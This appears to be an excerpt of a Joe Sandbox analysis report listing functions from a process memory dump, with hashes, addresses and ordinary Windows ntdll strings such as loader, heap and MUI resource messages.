Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 771b4faeb0bbcc0d67f208f8c8390f81b24e3997ad999aa09301b0d8642bc6de
Instruction ID: d7c7087b39d4a97dc1e3a6678e1f80e4a987414a832ff46a492291feaec5a3fe
Opcode Fuzzy Hash: 771b4faeb0bbcc0d67f208f8c8390f81b24e3997ad999aa09301b0d8642bc6de
Instruction Fuzzy Hash: D4411831920399CBEB25EBE9C940BADBBB4FF55340F580469DA01EB782D7B4D901CB10

Function 01294755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 0129488F
minkernel\ntdll\ldrredirect.c, xrefs: 01294899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01294888

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 54f238c7352bc5209d4ec995407e1565de87f2cfe92d98ad7f0895fa0212a79d
Instruction ID: 2aa4b5f7ca198be9ddc57106ee3a7ea8d49e5d264213ce910e3df7bcd1aa1982
Opcode Fuzzy Hash: 54f238c7352bc5209d4ec995407e1565de87f2cfe92d98ad7f0895fa0212a79d
Instruction Fuzzy Hash: 2541F132A346928FCF26EE5DDA40A6A7BE4BF49A54F05055DEE499B351D330D802CB80

Function 01220BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01275431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01275449
HEAP: , xrefs: 0127543E

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 9fd1841ecef1e6675ea379802d5cedf3964062277c081f03aafe1966c5a39535
Instruction ID: ab01151cc0f85809af08247ad1a940a16f40864b33a4bc77ad8af5313ace108c
Opcode Fuzzy Hash: 9fd1841ecef1e6675ea379802d5cedf3964062277c081f03aafe1966c5a39535
Instruction Fuzzy Hash: 1E11DF31374152AFDB2ACF18C466B3AF7A5EF50615F18852EF506CB292EB30E840CB58

Function 012920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 012920FA
minkernel\ntdll\ldrinit.c, xrefs: 01292104
Process initialization failed with status 0x%08lx, xrefs: 012920F3

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: a4292c86c4405cc10bcb143f506179adfc79b867ed282b9ea5fd68bad1787ace
Instruction ID: 3c7232f4b1e5efc1983f0a28f434e604288063870bf63190b3e7ab167639ade9
Opcode Fuzzy Hash: a4292c86c4405cc10bcb143f506179adfc79b867ed282b9ea5fd68bad1787ace
Instruction Fuzzy Hash: 96F0AF75660209BFEB28E64D9C56FA977ACEB40B54F50006DFB0077286E3B0A950CA91

Function 012203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01274D8A

Strings

#%u, xrefs: 01274D82

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: ee69f0406a538146de0081ef0cea4470cb8585996284b7ee3a041230d2192859
Instruction ID: 65948b0aa320177eb87ebb67b89a4153e86265ec7bcda066f83da93f4c5c7db9
Opcode Fuzzy Hash: ee69f0406a538146de0081ef0cea4470cb8585996284b7ee3a041230d2192859
Instruction Fuzzy Hash: AD715A71A2015AAFDB05DFA8C994BAEB7F8FF08304F144065EA05E7251EB78ED41CB64

Function 0121A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0121AA25
LdrResSearchResource Enter, xrefs: 0121AA13

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 1cd0332776244868494f077c3566a05119a29389c5d96f7e1e7a9b81c22cf8b8
Instruction ID: 8b57580f3bee7b77e8e035343007c032fb3855d250effef16fc97eebeb2de31b
Opcode Fuzzy Hash: 1cd0332776244868494f077c3566a05119a29389c5d96f7e1e7a9b81c22cf8b8
Instruction Fuzzy Hash: 00E18371E2129ADFEF22CE99D980BAEBBF9BF24310F144425EA01E7245E774D940CB51

Function 012DA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 012DA44B
`, xrefs: 012DA551

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: dc9a2159e2798b73ee8f4d0a91d7b3fe3a6dca69e67bce541f55e15bd334c34e
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: E6C1AE312243429BEB25CF28C841F6BBBE5EFD4318F184A2DF6968B290D7B5D545CB81

Function 0128E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0128E751
Legacy, xrefs: 0128E75A

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 996d3b6d71571151addf15a3de239165b44238ca3297e2f8a024eabf55b756b0
Instruction ID: 43cbdb941794575ccef47fd1234cd25c47012d53ec7fc723cf50f652b652acd1
Opcode Fuzzy Hash: 996d3b6d71571151addf15a3de239165b44238ca3297e2f8a024eabf55b756b0
Instruction Fuzzy Hash: F7616D71E212199FDB15EFA8C940BBEBBB9FB54700F15402DEA49EB291D731A940CB50

Function 012B43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 012B4525
@, xrefs: 012B4437

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: fb22356ff39cd471b94859e29f56dc4c3df332528efac9fc2b2e830e80508f8b
Instruction ID: e6fa709234c7853dd82899d5f0d8d755341efd2913d9dd86a70f2461209bcd46
Opcode Fuzzy Hash: fb22356ff39cd471b94859e29f56dc4c3df332528efac9fc2b2e830e80508f8b
Instruction Fuzzy Hash: E0514A71D2065EAFDF11DFE9CCC0AEEBBB8EB58794F100529EA11B7281D6349905CB60

Function 012104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0121063D
kLsE, xrefs: 01210540

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 0c2b3f19cae03396039cfb3f03f42f5a600dd53b1950623093bb6789088d54ba
Instruction ID: 2efc311bdac41447132595da2df11a12ff95f2491189418adefc50cff9150945
Opcode Fuzzy Hash: 0c2b3f19cae03396039cfb3f03f42f5a600dd53b1950623093bb6789088d54ba
Instruction Fuzzy Hash: A251CF715207869FC725EF68C4406A7BBE4AFA4304F104C3EFA9987245E770D985CB99

Function 0121A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0121A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0121A2FB

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: b5cd48a0ceb9923478079b2eb8e9c7de55221724026761d60eff4352c70b4b50
Instruction ID: 82b8c49771aef93cd9e4d8ab8c32f1da0a31ce4d74fdd84e77fdb95ffbcced43
Opcode Fuzzy Hash: b5cd48a0ceb9923478079b2eb8e9c7de55221724026761d60eff4352c70b4b50
Instruction Fuzzy Hash: A741AC70A2569ADBDB16CF69C840B7EBBF4FF94700F2440A5EA05DB295E3B5DA00CB50

Function 0124A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0124A5E9
Cleanup Group, xrefs: 0124A5E4

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 75369db83e2d6aab24e21fff805dd03f5d615416651c4bac3294311170d35a80
Instruction ID: 798bcace8f5a196ab100f20722686ad0f5f080ea1f51b25f2f18c4075a3837f6
Opcode Fuzzy Hash: 75369db83e2d6aab24e21fff805dd03f5d615416651c4bac3294311170d35a80
Instruction Fuzzy Hash: 050128B22A0704EFD311DF14CD4AF2677E8E794B29F008939B649C7594E774D804CB4A

Function 0121C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0121C8C3, 0121CA40

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f54f27c24b9c59841f43ec9ee159e37dcd53536dcb2d336aaa6331e00deb6387
Instruction ID: 7a163fa276b504dd9cae72b19d8c77932aeeb105e485148d4d820cce962e0410
Opcode Fuzzy Hash: f54f27c24b9c59841f43ec9ee159e37dcd53536dcb2d336aaa6331e00deb6387
Instruction Fuzzy Hash: 48829C79E60219CBEB25CFA8C8847EDBBF1FF68310F148169DA19AB258D7709941CF50

Function 01296420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 012965C1

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 53ee7a60d0bf8cc5434a9c5b8fde4089d9dbb84c42123a20f1c63aaeae3a4988
Instruction ID: d4336a46b7d45f8ffe283a1942ec14f304468a61d87182186ccd8b654d6bb556
Opcode Fuzzy Hash: 53ee7a60d0bf8cc5434a9c5b8fde4089d9dbb84c42123a20f1c63aaeae3a4988
Instruction Fuzzy Hash: EB9151B1A6021AAFDB21DF99CD85FAEBBB8EF58750F104055F700AB190D775AD04CB90

Function 012BE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 012BE1FA

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: aab6bdf0c43ff65d1408b043fe7d4a8e9556814c9f025b01055081967f9b000d
Instruction ID: f7f67460616a75e94b51efb9049e210ebee6bbc982444c570290bdf1872c564a
Opcode Fuzzy Hash: aab6bdf0c43ff65d1408b043fe7d4a8e9556814c9f025b01055081967f9b000d
Instruction Fuzzy Hash: C591AE7292160ABFDB26ABA4DC84FFFBB79EF45780F150025F601A7250E778A941CB50

Function 0124A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 012867C9

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 11498650fcc42d2236770a194f41a4781bc9bae43cebddd352ccee1acbf56d69
Instruction ID: 71fa5477e02a64fc5417ffdc5afbb28a4776fb41b6eefc1f92652b4fd0980135
Opcode Fuzzy Hash: 11498650fcc42d2236770a194f41a4781bc9bae43cebddd352ccee1acbf56d69
Instruction Fuzzy Hash: 9C7190B5E2121ACFDF28EF9CD5916ADBBB2FF48700F14812EE605A7281E7708945CB50

Function 012B4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 012B4A7F

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 3beb592335b5ab9d1b33b57ad9795d0545a47173959c9b47fb086e3e6cf77786
Instruction ID: 1abc1a0a197be9153e01b7d14b1361571fffcd0645ad37be2fac87a469c06e9c
Opcode Fuzzy Hash: 3beb592335b5ab9d1b33b57ad9795d0545a47173959c9b47fb086e3e6cf77786
Instruction Fuzzy Hash: CB51B672D2026A9BDB14EF99D8D0AEEBBB9BF14750F054129EA12B7241D3749C01CBE0

Function 0122E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0122E6A4

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: d6e36cc97632b4c61613c66ba5da502879f1ae41cfa92a1edaed5ca8b8fb96ae
Instruction ID: 8b8fa7a518714e8d85a675cd16a5e5b7ad271b028acb993b2289c0a79f8ce850
Opcode Fuzzy Hash: d6e36cc97632b4c61613c66ba5da502879f1ae41cfa92a1edaed5ca8b8fb96ae
Instruction Fuzzy Hash: 4541A072528322BBD724DA75C840BAFBBE8AF98714F45092DFA84E7180E774D904D792

Function 0128C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0128C77F

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 0aa4d8ec204f4329b728ce3418a02691dd20bbf7992b55c93d66c1027ad28d9f
Instruction ID: b0d6d9c35ef497cc92ac65ed86a27f51b494c9c1b18ea86abcaf2c315e364f2b
Opcode Fuzzy Hash: 0aa4d8ec204f4329b728ce3418a02691dd20bbf7992b55c93d66c1027ad28d9f
Instruction Fuzzy Hash: 914146B1D6112DABDF21EB50CC84FEEB77CAB44714F0045A5EB08A7180DB709E998FA4

Function 012A6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 012A6B91

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: a10fba2b6037c4027092ae36dea5ebb4a9812e9cd01f1e4126ad12613c687bd0
Instruction ID: 1415d80b70c8316a7f89a4974ae103128f7cc802ccf6c13910fa71c5522a66d9
Opcode Fuzzy Hash: a10fba2b6037c4027092ae36dea5ebb4a9812e9cd01f1e4126ad12613c687bd0
Instruction Fuzzy Hash: 30316131A203599BDB32DF68C858BFEB7B9DF04704F984069EA40AB281D775D805CB50

Function 0128CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0128CAA2

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: f60e7bee796e592aed7820f218a2521a5f8b0b487f1a5beb112ba7b58c42828c
Instruction ID: bd33b11d14c7379dff9b573fd378fd84e0a5e99336e3c58803d91025ad3f16c2
Opcode Fuzzy Hash: f60e7bee796e592aed7820f218a2521a5f8b0b487f1a5beb112ba7b58c42828c
Instruction Fuzzy Hash: B931E876911916EFDB15EA59C845EBFBB74FB40720F018129EA05A7290E7309D14D7F0

Function 0129892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0129895E

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 215fc40779c47e5c7a3be737d404805102b260dd8fbecfff8a29021f4950f170
Instruction ID: 09c8cab07478fb0a1d6c26ce8c88310f02de5fd0a170c4ff2f58e1c96f2bb640
Opcode Fuzzy Hash: 215fc40779c47e5c7a3be737d404805102b260dd8fbecfff8a29021f4950f170
Instruction Fuzzy Hash: 9201FC3233020A5FFF365B5DCC94B667BA9EF97254F0C001DF74106651CB606841CB92

Function 012B2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ea6917a4372391574b3ed72d106d5ce5b771409a22b0f28fa3fc000e4a57db
Instruction ID: 1e63a46d9c718b4002c6a405785667b6f456c8587060859d058c622d6ccf2d4a
Opcode Fuzzy Hash: 70ea6917a4372391574b3ed72d106d5ce5b771409a22b0f28fa3fc000e4a57db
Instruction Fuzzy Hash: 9B42B431628342DBD715CF68C8D0AABBBE5EF88380F08492DFA9697251D774E845CB52

Function 012A8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 089d715b682143dc3979ee85e61e71fc3850270373e0f04e9f77d6ec26cd86eb
Instruction ID: d99275399761265e0da96db63bcd8fffd689a85c0ce4063c87a45d4ca5f0bee8
Opcode Fuzzy Hash: 089d715b682143dc3979ee85e61e71fc3850270373e0f04e9f77d6ec26cd86eb
Instruction Fuzzy Hash: 36426D75E202198FEB24CF69C881BADBBF5FF88301F548199EA49EB241D7349985CF50

Function 01222840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8baef189c787c71d777526cf3732001b6e301390033686895404e1904c744b
Instruction ID: 8059a78c157803434443594a8951bb435ba09c1c109adc10c9dfaecb87fa58d8
Opcode Fuzzy Hash: ac8baef189c787c71d777526cf3732001b6e301390033686895404e1904c744b
Instruction Fuzzy Hash: A732FC70A20B568FEB25CF69C8547BFBBF2BF84300F24411DD6869B285D775A806CB50

Function 012BA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc241d3ee28a39d09785f17b887812ceaf9984063ca0ced146258f0bd441ddca
Instruction ID: 35478d605a347918c0d6e01431a9d0aa790b48a6131a77f686d98bd2c4af5657
Opcode Fuzzy Hash: dc241d3ee28a39d09785f17b887812ceaf9984063ca0ced146258f0bd441ddca
Instruction Fuzzy Hash: 4422D0706346528FEB25CF2DC0D53B6BBF1AF44380F08845ADA968B286D775E582DB60

Function 01216A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc5fd1f17148531a3b2069a9f881838d87a88e8ffca62a679c339715932441c
Instruction ID: 27d563eb4d0c45937f068f0802d78742036089271bf271d557ea6c73cbd48e49
Opcode Fuzzy Hash: 7dc5fd1f17148531a3b2069a9f881838d87a88e8ffca62a679c339715932441c
Instruction Fuzzy Hash: 6A32E071A20216CFDB25CF68C480BAEBBF1FF58300F148569EA55AB395D7B0E851CB90

Function 01234A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 00f20ac4dc7736c7486d1d8b928e98d1cef32fb9cd1f5670107594b777a2440a
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 37F194B1E2024A9BDF15DF99D580BAEBBF5BF88714F088169EA05AB340E774DC41CB50

Function 012A892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c13b534c3ae39f0424707d7802368f7d277aadc1d41c7a2f48f6dd3b0e5fb36
Instruction ID: 3f9fd22a349c2a6d90c687d06165698ba27338f3d5ee9eded2b27f1d47457bd2
Opcode Fuzzy Hash: 7c13b534c3ae39f0424707d7802368f7d277aadc1d41c7a2f48f6dd3b0e5fb36
Instruction Fuzzy Hash: 13D10372E2060A9BDF09CF69C841AFEB7F2BF88305F588169D955E7241E735E901CB60

Function 012165D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb05d5c7b95541b517b709a278c5a4958e2375f1e99ec8a7a23817edf8bd2733
Instruction ID: 193b4d1667968661682d31e7b06f8b2143fffdb07fef7dbb13b9eb7b83f5a010
Opcode Fuzzy Hash: cb05d5c7b95541b517b709a278c5a4958e2375f1e99ec8a7a23817edf8bd2733
Instruction Fuzzy Hash: C8E1D171618342CFC715CF28C080A6EBBE1FF99314F05896DE9958B355EBB1E905CB92

Function 01208397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8bdc779f0eed6a4327867bdfa093ce6b78074cf4120c24e2f4f727276b79a46
Instruction ID: d4c15881f1c1655daebdc30d14efaca9f3ef7ea0581850410c2f4d8c0d5cb4b2
Opcode Fuzzy Hash: f8bdc779f0eed6a4327867bdfa093ce6b78074cf4120c24e2f4f727276b79a46
Instruction Fuzzy Hash: C3D1E371B206079BDB1ADF28C891ABB77A5FF54304F054229EA15DB2D2EB30D991CB50

Function 01298243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 0b2b139b2f4c1a81415216e281082eff49448c315ba5bdbd55171307ea6de5b4
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 17B16574A106499FDF24DF5DC940EABBBB5FF86304F18446EAA42D7790DA34E905CB10

Function 01220535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: c3e61181de36052f27b584cfbce6eee41aabaa74978018dfd8046a13feb456bb
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 72B10831620656AFDB26DB68C850BBFBBF6BF88300F140559E652DB281DB70ED41CB94

Function 012183C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

